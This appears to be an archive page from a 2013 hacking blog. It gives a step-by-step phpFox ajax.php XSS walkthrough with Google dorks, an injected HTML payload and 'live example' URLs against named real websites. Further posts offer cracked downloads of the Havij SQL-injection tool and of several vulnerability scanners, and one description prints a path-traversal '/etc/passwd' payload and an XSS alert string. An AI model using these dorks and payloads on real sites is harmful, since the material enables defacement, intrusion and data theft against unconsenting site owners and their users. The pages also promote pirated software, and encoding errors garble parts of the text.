Showing posts with label Web Vulnerability Scanner. Show all posts
Showing posts with label Web Vulnerability Scanner. Show all posts

Saturday, October 19, 2013

phpFox (ajax.php) XSS Vulnerability

BY Unknown IN , , , 1 comment

PhpFox is a Php Script For Making Social Networking website, Similiar to Facebook.
3.1 and some other versions of PhpFox are vulnerable For XSS.cats.jpg (449�581)

Google Dork :
"intext:� � English (US) Powered By phpFox Version 3.0.1."
 "inurl:/static/ajax.php?core"


Open any website for search results with text :� � English (US) Powered By phpFox Version 3.0.1
or url xyz.com/static/ajax.php?core
now You'll Get something Like This URL give below
http://www.devilscafe.in/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<div class="error_message">some message here&core[security_token]=99d754d2b583565369e194e30eaabcbc

Now Chnage the Text &Message= blah blah blah....  (you have to replace the red text with your html Tags)
for example

http://www.devilscafe.in/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=
<center><font color="red"><h2>XSS</h2><br><h1>www.devilscafe.in</h1><a href='http://www.devilscafe.in'><imgsrc="http://i55.tinypic.com/14uuv14.png"/>
&core[security_token]=99d754d2b583565369e194e30eaabcbc

You can use multiple html Tags, and scripts here For details Check This Post 

Live examples : 
http://onlinesocial.in/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<center><font color="red"><h2>XSS</h2><br><h1>www.devilscafe.in</h1><a href='http://www.devilscafe.in'><img src="http://i55.tinypic.com/14uuv14.png"/>&core[security_token]=99d754d2b583565369e194e30eaabcbc
http://www.marshable.net/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message= <center><font color="red"><h2>XSS</h2><br><h1>www.devilscafe.in</h1><a href='http://www.devilscafe.in'><img src="http://i55.tinypic.com/14uuv14.png"/>
http://artisticdimeinc.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20<center><font%20color="red"><h2>XSS</h2><br><h1>www.devilscafe.in</h1><a%20href='http://www.devilscafe.in'><img%20src="http://i55.tinypic.com/14uuv14.png"/>
http://mstudio84.com/gist/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ccenter%3E%3Cfont%20color=%22red%22%3E%3Ch2%3EXSS%3C/h2%3E%3Cbr%3E%3Ch1%3Ewww.devilscafe.in%3C/h1%3E%3Ca%20href='http://www.devilscafe.in'%3E%3Cimg%20src=%22http://i55.tinypic.com/14uuv14.png%22/%3E
http://parsdb.ir/accessories/social_network/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ccenter%3E%3Cfont%20color=%22red%22%3E%3Ch2%3EXSS%3C/h2%3E%3Cbr%3E%3Ch1%3Ewww.devilscafe.in%3C/h1%3E%3Ca%20href='http://www.devilscafe.in'%3E%3Cimg%20src=%22http://i55.tinypic.com/14uuv14.png%22/%3E
http://sohiran.ir/fb/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ccenter%3E%3Cfont%20color=%22red%22%3E%3Ch2%3EXSS%3C/h2%3E%3Cbr%3E%3Ch1%3Ewww.devilscafe.in%3C/h1%3E%3Ca%20href='http://www.devilscafe.in'%3E%3Cimg%20src=%22http://i55.tinypic.com/14uuv14.png%22/%3E

Website Vunerablity Scanner : SQLi | LFI | XSS | Shell Upload

BY Unknown IN , , No comments


Its a Amazing Tool, You can use it for checking SQLi,LFI , XSS , Shell Upload vulnerablities of websites, Its for n00bs and beginners !
Then follow the procedure how to scan it .... Pic below



Hope you understand..   any queries Do Comment ;)

Download Now

Thursday, October 17, 2013

Havij Pro 1.16 Portable Cracks+Keys Free Download Full Version

BY Unknown IN , , No comments


Download Havij Pro 1.16 Portable Cracks+Keys Free Download Full Version

Description:
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and  password hashes, dump tables and columns, fetching data from the database, running SQL  statements and even accessing the underlying file system and executing commands on the  operating system.

The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.

The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.


What's New?
�         Multithreading
�         Oracle Blind injection method.
�         Automatic all parameter scan added.
�         New blind injection method (no more ? char.)
�         Retry for blind injection.
�         A new method for tables/columns extraction in mssql blind.
�         A WAF bypass method for mysql blind.
�         Getting tables and columns even when can not get current database.
�         Auto save log.
�         bugfix: url encode bug fixed.
�         bugfix: trying time based methods when mssql error based and union based fail.
�         bugfix: clicking get columns would delete all tables.
�         bugfix: reseting time based method delay when applying settings.
�         bugfix: Oracle and PostgreSQL detection



Download Xcode Exploite Vulnerability Scanner Free Full Version

BY Unknown IN , , No comments

Download Xcode Exploite Website Vulnerability Scanner Free Full Version

USAGE:
Once downloaded, extract all the files and run XCode eXploit Scanner.exe, insert your dork, Click Dork It And it will collect links from Dork you enter and displays the list. after displaying List, you will be able to conduct SQL injection vulnerability scanning / Local File Inclusion / Cross Site Scripting on the web that is in the list. This tool will send the injection parameters to the web as� � * /../../../../../../../../../../../../. . / .. / etc / passwd% 00 �> alert (� XSS Xcode Exploit Scanner detected �). If the Web has a bug then the status will appear: http://www.target.com?blabla.php?=1234: SQLi Vulnerable.
http://www.target.com?blabla.php?=1234/../../../../../../../../../../../../. . / .. / etc / passwd% 00 LFI Vulnerable
http://www.target.com?blabla.php?=1234 �> alert (� XXS Xcode Exploit Scanner Detected �) XSS Vulnerable
At the status list is detected, you can click Open Vuln Link with Browser to display on your browser
This tool also adds webshell hunter, where you can search the web shell C99, R57, C100, ITsecteam_shell, b374k, which had been uploaded by the hackers.
If the list of �Google results� do not bring results, you can try some tricks
[1] change the search path from �/cse?FORID:1&q=� to �/search?Q=�
[2] Click �Show Captcha�, fill in the code.
[3] change the google domain, example: from com to co.id , com.br, fr, co.th, com.ch or etc
Perhaps there are many shortcomings or bugs are not known by the author. But at least this tool you can make it easier to find targets.


Download Gr3eNox Vulnerability Finder for SQLi, RFI, LFI Free Full Version (Mediafire)

BY Unknown IN , , No comments


Download Gr3eNox Vulnerability Finder for SQLi, RFI, LFI

Gr3enOx This is good vulnerability scanner for SQL Injection, LFI, RFI
I personally used this software this is a good tool for beginner Visit Google Dorks List to Find Latest/Private Dorks


Download Here
Mediafire Download  Link:
Download Here